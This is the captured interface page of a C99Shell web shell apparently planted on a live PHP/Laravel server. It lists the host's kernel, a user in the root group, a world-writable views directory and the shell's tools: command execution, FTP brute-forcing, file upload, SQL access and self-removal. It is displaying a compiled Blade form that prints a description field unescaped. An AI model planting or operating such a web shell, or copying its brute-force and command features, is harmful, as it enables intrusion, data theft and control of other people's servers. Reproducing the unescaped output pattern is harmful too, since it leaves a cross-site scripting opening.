!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/sms.picotech.app/public_html/storage/framework/views/   drwxrwxrwx
Free 28.37 GB of 117.98 GB (24.05%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     a57618ba1aeb158d3a92ae27c649545d.php (2.56 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<div class="form-group">
    <label for="title"><?php echo app('translator')->get('admin.form.title'); ?></label>
    <input value="<?php echo e(isset($notice)?$notice->title:old('title')); ?>" type="text" name="title" class="form-control" id="title"
           placeholder="<?php echo app('translator')->get('admin.form.input.title'); ?>">
</div>

<div class="form-group">
    <label for="price"><?php echo e(trans('admin.table.description')); ?></label>
    <textarea name="description" class="form-control" cols="4" rows="4"><?php echo isset($notice)?$notice->description:''?></textarea>
</div>

<div class="row">
    <div class="form-group col-md-6">
        <label for="status"><?php echo e(trans('customer.type')); ?></label>
        <select class="form-control" name="type" id="is_reseller">
            <option <?php echo e(isset($notice) && $notice->for=='all'?'selected':(old('type')=='all'?'selected':'')); ?> value="all"><?php echo e(trans('admin.all')); ?></option>
            <option <?php echo e(isset($notice) && $notice->for=='normal'?'selected':(old('type')=='normal'?'selected':'')); ?> value="normal"><?php echo e(trans('admin.type_customer')); ?></option>
            <option <?php echo e(isset($notice) && $notice->for=='reseller'?'selected':(old('type')=='reseller'?'selected':'')); ?> value="reseller"><?php echo e(trans('admin.reseller')); ?></option>
            <option <?php echo e(isset($notice) && $notice->for=='reseller_customer'?'selected':(old('type')=='reseller_customer'?'selected':'')); ?> value="reseller_customer"><?php echo e(trans('admin.reseller_customer')); ?></option>
        </select>
    </div>
    <div class="form-group col-md-6">
        <label for="status"><?php echo app('translator')->get('admin.form.status'); ?></label>
        <select class="form-control" name="status" id="status">
            <option <?php echo e(isset($notice) && $notice->status=='active'?'selected':(old('status')=='active'?'selected':'')); ?> value="active">
                <?php echo e(trans('admin.active')); ?></option>
            <option <?php echo e(isset($notice) && $notice->status=='inactive'?'selected':(old('status')=='inactive'?'selected':'')); ?> value="inactive">
                <?php echo e(trans('admin.inactive')); ?></option>
        </select>
    </div>
</div>

<div class="form-group">
    <label for=""><?php echo e(trans('admin.attached_data')); ?></label>
    <input type="file" class="form-control p-1" name="attached_data">
</div>

</div>
<?php /**PATH /home/picotech/domains/sms.picotech.app/public_html/resources/views/admin/notice/form.blade.php ENDPATH**/ ?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0054 ]--